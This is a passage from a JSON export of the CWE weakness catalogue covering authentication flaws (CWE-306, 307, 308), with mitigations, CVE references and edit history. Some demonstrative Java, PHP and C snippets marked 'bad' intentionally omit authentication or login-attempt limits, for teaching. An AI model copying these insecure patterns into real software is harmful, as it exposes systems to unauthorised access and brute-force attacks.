password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374"},{"Reference":"CVE-2000-0979","Description":"The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979"},{"Reference":"CVE-2001-0088","Description":"Chain: Forum software does not properly initialize an array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the password and gain administrative privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0088"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass by Primary Weakness"}},"Notes":{"Note":{"#text":"Most \\"authentication bypass\\" errors are resultant, not primary.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"306":{"attr":{"@_ID":"306","@_Name":"Missing Authentication for Critical Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Other"],"Note":"Exposing critical functionality essentially provides an attacker with the privilege level of that functionality. The consequences will depend on the associated functionality, but they can range from reading or modifying sensitive data, access to administrative or other privileged functionality, or possibly even execution of arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7.2"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authentication mechanisms."]},"Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-6.1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.","Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives."]},"Effectiveness":"Limited"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.","Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.","In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Where possible, avoid implementing custom authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These may make it easier to provide a clear separation between authentication tasks and authorization tasks.","In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly."]}},{"attr":{"@_Mitigation_ID":"MIT-4.5"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45]."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the method createBankAccount is used to create a BankAccount object for a bank management application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount createBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);return account;","xhtml:br":["","","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private boolean isUserAuthentic = false;public boolean authenticateUser(String username, String password) {}public BankAccount createNewBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// authenticate user,","// if user is authenticated then set variable to true","// otherwise set variable to false"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount account = null;if (isUserAuthentic) {}return account;","xhtml:br":["","",""],"xhtml:div":{"#text":"account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}}]}}],"Body_Text":["However, there is no authentication mechanism to ensure that the user creating this bank account object has the authority to create new bank accounts. Some authentication mechanisms should be used to verify that the user has the authority to create bank account objects.","The following Java code includes a boolean variable and method for authenticating a user. If the user has not been authenticated then the createBankAccount will not create the bank account object."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1810","Description":"MFV. Access TFTP server without authentication and obtain configuration file with sensitive plaintext information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1810"},{"Reference":"CVE-2008-6827","Description":"Agent software running at privileges does not authenticate incoming requests over an unprotected channel, allowing a Shatter\\" attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6827"},{"Reference":"CVE-2004-0213","Description":"Product enforces restrictions through a GUI but not through privileged APIs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2020-15483","Description":"monitor device allows access to physical UART debug port without authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"No Authentication for Critical Function"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP31","Entry_Name":"Missing authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"12"}},{"attr":{"@_CAPEC_ID":"166"}},{"attr":{"@_CAPEC_ID":"36"}},{"attr":{"@_CAPEC_ID":"62"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authentication,&#34; Page 36"}},{"attr":{"@_External_Reference_ID":"REF-257"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Notes":{"Note":{"#text":"This is separate from \\"bypass\\" issues in which authentication exists, but is faulty.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"No Authentication for Critical Function","attr":{"@_Date":"2010-02-16"}}}},"307":{"attr":{"@_ID":"307","@_Name":"Improper Restriction of Excessive Authentication Attempts","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"799","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"An attacker could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Forced Path Execution"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Common protection mechanisms include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Disconnecting the user after a small number of failed attempts","Implementing a timeout","Locking out a targeted account","Requiring a computational task on the user\'s part."]}}}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]"]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-117"},"Intro_Text":"In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter\'s support team and was able to successfully guess the member\'s password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-236"}}}},{"Intro_Text":"The following code, extracted from a servlet\'s doPost() method, performs an authentication lookup every time the servlet is invoked.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");String password = request.getParameter(\\"password\\");int authResult = authenticateUser(username, password);","xhtml:br":["","",""]}},"Body_Text":"However, the software makes no attempt to restrict excessive authentication attempts."},{"Intro_Text":"This code attempts to limit the number of login attempts by causing the process to sleep before completing the authentication.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_POST[\'username\'];$password = $_POST[\'password\'];sleep(2000);$isAuthenticated = authenticateUser($username, $password);","xhtml:br":["","",""]}},"Body_Text":"However, there is no limit on parallel connections, so this does not increase the amount of time an attacker needs to complete an attack."},{"Intro_Text":"In the following C/C++ example the validateUser method opens a socket connection, reads a username and password from the socket and attempts to authenticate the username and password.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int validateUser(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int socket = openSocketConnection(host, port);if (socket &lt; 0) {}int isValidUser = 0;char username[USERNAME_SIZE];char password[PASSWORD_SIZE];while (isValidUser == 0) {}return(SUCCESS);","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int validateUser(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int count = 0;while ((isValidUser == 0) &amp;&amp; (count &lt; MAX_ATTEMPTS)) {}if (isValidUser) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}count++;","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":""}},{"#text":"return(SUCCESS);","attr":{"@_style":"margin-left:10px;"}},{"#text":"return(FAIL);","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"The validateUser method will continuously check for a valid username and password without any restriction on the number of authentication attempts made. The method should limit the number of authentication attempts made to prevent brute force attacks as in the following example code."},{"Intro_Text":"Consider this example from a\\n\\t\\t    real-world attack against the iPhone\\n\\t\\t    [REF-1218]. An attacker can use brute force\\n\\t\\t    methods; each time there is a failed guess, the\\n\\t\\t    attacker quickly cuts the power before the failed\\n\\t\\t    entry is recorded, effectively bypassing the\\n\\t\\t    intended limit on the number of failed\\n\\t\\t    authentication attempts. Note that this attack\\n\\t\\t    requires removal of the cell phone battery and\\n\\t\\t    connecting directly to the phone\'s power source,\\n\\t\\t    and the brute force attack is still\\n\\t\\t    time-consuming."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1152","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1152"},{"Reference":"CVE-2001-1291","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1291"},{"Reference":"CVE-2001-0395","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0395"},{"Reference":"CVE-2001-1339","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1339"},{"Reference":"CVE-2002-0628","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0628"},{"Reference":"CVE-1999-1324","Description":"User accounts not disabled when they exceed a threshold; possibly a resultant problem.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1324"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"AUTHENT.MULTFAIL","Entry_Name":"Multiple Failed Authentication Attempts not Prevented"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP34","Entry_Name":"Unrestricted authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-1218"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Multiple Failed Authentication Attempts not Prevented","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Restrict Excessive Authentication Attempts","attr":{"@_Date":"2010-02-16"}}]}},"308":{"attr":{"@_ID":"308","@_Name":"Use of Single-factor Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme.","Extended_Description":"While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused, and common passwords is rampant on the internet. Without the added protection of multiple authentication schemes, a single mistake can result in the compromise of an account. For this reason, if multiple schemes are possible and also easy to use, they should be implemented and required.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"654","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"309","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If the secret in a single-factor authentication scheme gets compromised, full authentication is possible."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use multiple independent authentication schemes, which ensures that -- if one of the methods is compromised -- the system itself is still likely safe from compromise."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given 